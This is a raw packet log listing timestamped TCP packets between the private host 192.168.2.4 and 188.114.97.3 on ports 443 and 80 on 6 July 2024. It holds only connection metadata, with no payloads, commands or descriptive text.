Jul 6, 2024 13:26:59.844127893 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.844192028 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:26:59.844203949 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:07.654114008 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:07.661046982 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:07.661117077 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:07.661295891 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:07.668237925 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304615974 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304687023 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.304836035 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304869890 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304887056 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304888010 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.304903984 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304913998 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.304919958 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304934025 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.304936886 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304954052 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304960012 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.304968119 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.304970026 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304984093 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.304987907 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.304999113 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.305027008 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.305047989 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.309663057 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.309695959 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.309725046 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.309751987 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.309814930 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.309859037 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.395544052 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395561934 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395579100 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395596027 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395612001 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395617962 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.395637035 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395644903 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.395693064 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.395797014 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395840883 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.395873070 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395889044 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395915985 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.395931005 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.395939112 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395956039 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395971060 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.395982981 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.395997047 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.396011114 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.396817923 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.396868944 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.396871090 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.396888018 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.396914005 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.396933079 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.396975040 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.396991968 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.397006989 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.397022963 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.397048950 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.397773981 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.397825956 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.397830009 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.397845984 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.397876978 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.397890091 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.397919893 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.397936106 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.397969961 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.397983074 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.486430883 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.486504078 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.486598015 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.486649036 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.486649990 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.486668110 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.486701965 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.486726046 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.530008078 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530081987 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.530090094 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530131102 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.530498028 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530551910 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530567884 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530602932 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.530630112 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.530709028 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530725956 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530740976 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530781984 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.530803919 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.530878067 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530903101 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530924082 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.530947924 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.530972004 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.531006098 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531021118 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531038046 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531054020 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531074047 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.531088114 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.531132936 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.531311989 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531366110 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.531807899 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531862020 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.531874895 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531897068 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531919003 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.531939030 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.531966925 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531982899 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.531999111 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.532011986 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.532016993 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.532027960 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.532047987 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.532071114 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.532227039 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.532282114 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.532984018 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.532999039 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.533020973 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.533037901 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.533039093 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.533061028 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.533090115 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.533118010 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.533133984 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.533149958 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.533168077 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.533174038 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.533200026 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.533219099 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.580889940 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.580904961 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.580919981 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.580967903 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.580993891 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.581170082 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.581186056 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.581202030 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.581218958 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.581238985 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.682420969 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.682452917 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.682468891 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.682495117 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.682526112 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.682526112 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.682585001 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.682604074 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.682620049 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.682637930 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.682651043 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.682658911 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.772794962 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.772840023 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.772857904 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.772891998 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.772912979 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.772924900 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.772931099 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.772950888 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.772963047 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.772969007 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773005962 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773025036 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773027897 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773041964 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773078918 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773096085 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773188114 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773210049 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773226976 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773242950 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773246050 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773263931 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773264885 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773283958 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773298979 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773319006 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773757935 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773819923 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773888111 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773905993 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773955107 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773956060 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.773972034 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.773988962 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774019957 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.774044037 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.774063110 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774117947 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.774486065 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774538994 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.774568081 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774584055 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774622917 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.774719954 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774734974 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774751902 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774772882 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.774796963 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.774903059 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774919033 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774935007 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.774966002 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.774992943 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.775387049 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.775439978 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.775443077 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.775460005 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.775501013 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.775544882 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.775562048 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.775578022 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.775603056 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.775619984 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.846956015 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.846997023 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847013950 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847068071 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.847095966 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.847445965 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847498894 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847515106 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847559929 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.847584963 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.847592115 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847609997 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847645044 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847666979 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.847685099 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.847701073 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847718000 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.847748995 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.847762108 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.847795963 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848076105 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848129034 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848144054 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.848145008 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848181963 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.848198891 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.848243952 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848262072 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848278999 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848295927 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848315954 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.848340988 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.848423004 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848438978 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848453999 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.848479986 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.848500967 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.863598108 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.863778114 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:08.999272108 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.999284029 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:08.999365091 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.000475883 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000539064 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.000544071 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000556946 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000582933 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000605106 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.000634909 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.000684023 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000742912 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.000758886 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000770092 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000818968 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.000956059 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000967979 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000979900 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.000992060 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001004934 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001017094 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001032114 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001046896 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001235962 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001285076 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001288891 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001296997 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001333952 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001373053 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001384974 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001395941 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001430035 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001444101 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001643896 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001696110 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001707077 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001718998 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001760006 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001832962 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001844883 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001856089 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001868010 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.001889944 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001919985 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.001966000 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002017021 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.002249956 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002300024 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.002305984 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002317905 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002361059 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.002418995 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002430916 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002440929 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002454042 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002475977 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.002495050 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.002665997 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002679110 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002690077 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002701044 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002717972 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.002722979 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.002746105 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.002768040 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.003163099 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.003215075 CEST	49731	80	192.168.2.4	188.114.97.3
